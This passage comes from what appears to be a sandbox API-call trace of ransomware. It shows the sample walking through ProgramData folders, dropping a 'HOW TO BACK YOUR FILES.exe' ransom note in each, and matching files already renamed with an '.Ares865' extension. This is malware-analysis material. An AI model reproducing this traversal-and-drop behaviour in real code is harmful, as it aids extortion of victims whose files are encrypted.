Size=0x13) returned 0x2e7b88 [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0160 [0090.389] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.389] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Sun" | out: lpString1="Sun") returned="Sun" [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1708 [0090.389] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0090.389] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f01e8 [0090.389] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0090.389] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Templates" [0090.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0090.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.389] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Templates") returned 62 [0090.389] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Templates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Templates" [0090.389] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.389] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.390] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.390] GetLastError () returned 0x0 [0090.390] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.390] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.390] CloseHandle (hObject=0x120) returned 1 [0090.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.390] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.390] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.390] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.391] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.391] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun" [0090.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0090.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.391] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Sun") returned 56 [0090.391] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun" [0090.391] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.391] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\sun\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.391] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.392] GetLastError () returned 0x0 [0090.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.392] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.392] CloseHandle (hObject=0x120) returned 1 [0090.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.392] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.392] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.392] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.392] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.392] lstrcpyW (in: lpString1=0x2cce472, lpString2="Java" | out: lpString1="Java") returned="Java" [0090.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0090.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f01e8 [0090.392] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0090.392] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java" [0090.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0090.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.392] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java") returned 61 [0090.392] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java" [0090.392] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.393] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\sun\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.393] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.393] GetLastError () returned 0x0 [0090.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.393] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.393] CloseHandle (hObject=0x120) returned 1 [0090.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.393] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.393] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.394] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Java Update" | out: lpString1="Java Update") returned="Java Update" [0090.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0090.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x334fc8 [0090.394] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0090.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update" [0090.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.394] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned 73 [0090.394] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update" [0090.394] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.394] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\sun\\java\\java update\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.395] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.395] GetLastError () returned 0x0 [0090.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.395] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.395] CloseHandle (hObject=0x120) returned 1 [0090.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.395] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Sun\\Java\\Java Update\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb334a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb334a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.395] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.395] lstrcpyW (in: lpString1=0x2cce494, lpString2="jaureglist.xml.Ares865" | out: lpString1="jaureglist.xml.Ares865") returned="jaureglist.xml.Ares865" [0090.395] lstrlenW (lpString="jaureglist.xml.Ares865") returned 22 [0090.396] lstrlenW (lpString="Ares865") returned 7 [0090.396] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.396] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu" [0090.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0090.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.396] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu") returned 63 [0090.396] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu" [0090.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.397] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.397] GetLastError () returned 0x0 [0090.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.397] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.397] CloseHandle (hObject=0x120) returned 1 [0090.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.397] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.397] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59468c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59468c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.397] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.397] lstrcpyW (in: lpString1=0x2cce480, lpString2="Default Programs.lnk.Ares865" | out: lpString1="Default Programs.lnk.Ares865") returned="Default Programs.lnk.Ares865" [0090.397] lstrlenW (lpString="Default Programs.lnk.Ares865") returned 28 [0090.397] lstrlenW (lpString="Ares865") returned 7 [0090.397] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.398] lstrcpyW (in: lpString1=0x2cce480, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.398] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.398] lstrlenW (lpString="Ares865") returned 7 [0090.398] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.398] lstrcpyW (in: lpString1=0x2cce480, lpString2="Programs" | out: lpString1="Programs") returned="Programs" [0090.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0090.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x334fc8 [0090.398] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.398] lstrcpyW (in: lpString1=0x2cce480, lpString2="Windows Update.lnk.Ares865" | out: lpString1="Windows Update.lnk.Ares865") returned="Windows Update.lnk.Ares865" [0090.398] lstrlenW (lpString="Windows Update.lnk.Ares865") returned 26 [0090.398] lstrlenW (lpString="Ares865") returned 7 [0090.398] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.398] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs" [0090.398] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs" [0090.398] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.398] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.399] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.399] GetLastError () returned 0x0 [0090.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.399] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.399] CloseHandle (hObject=0x120) returned 1 [0090.399] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.399] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59599720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59599720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.400] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.400] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.400] lstrcpyW (in: lpString1=0x2cce492, lpString2="Accessories" | out: lpString1="Accessories") returned="Accessories" [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2c8eb8 [0090.400] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.400] lstrcpyW (in: lpString1=0x2cce492, lpString2="Administrative Tools" | out: lpString1="Administrative Tools") returned="Administrative Tools" [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2cfda8 [0090.400] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0090.400] lstrcpyW (in: lpString1=0x2cce492, lpString2="Adobe Reader X.lnk.Ares865" | out: lpString1="Adobe Reader X.lnk.Ares865") returned="Adobe Reader X.lnk.Ares865" [0090.400] lstrlenW (lpString="Adobe Reader X.lnk.Ares865") returned 26 [0090.400] lstrlenW (lpString="Ares865") returned 7 [0090.400] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.400] lstrcpyW (in: lpString1=0x2cce492, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.400] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.400] lstrlenW (lpString="Ares865") returned 7 [0090.400] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.400] lstrcpyW (in: lpString1=0x2cce492, lpString2="Games" | out: lpString1="Games") returned="Games" [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0090.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x2d7700 [0090.401] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Google Chrome.lnk.Ares865" | out: lpString1="Google Chrome.lnk.Ares865") returned="Google Chrome.lnk.Ares865" [0090.401] lstrlenW (lpString="Google Chrome.lnk.Ares865") returned 25 [0090.401] lstrlenW (lpString="Ares865") returned 7 [0090.401] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Java" | out: lpString1="Java") returned="Java" [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x2d77a8 [0090.401] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Maintenance" | out: lpString1="Maintenance") returned="Maintenance" [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2e87c0 [0090.401] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Media Center.lnk.Ares865" | out: lpString1="Media Center.lnk.Ares865") returned="Media Center.lnk.Ares865" [0090.401] lstrlenW (lpString="Media Center.lnk.Ares865") returned 24 [0090.401] lstrlenW (lpString="Ares865") returned 7 [0090.401] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Microsoft Office" | out: lpString1="Microsoft Office") returned="Microsoft Office" [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0090.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f2fc8 [0090.401] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0090.401] lstrcpyW (in: lpString1=0x2cce492, lpString2="Mozilla Firefox.lnk.Ares865" | out: lpString1="Mozilla Firefox.lnk.Ares865") returned="Mozilla Firefox.lnk.Ares865" [0090.401] lstrlenW (lpString="Mozilla Firefox.lnk.Ares865") returned 27 [0090.401] 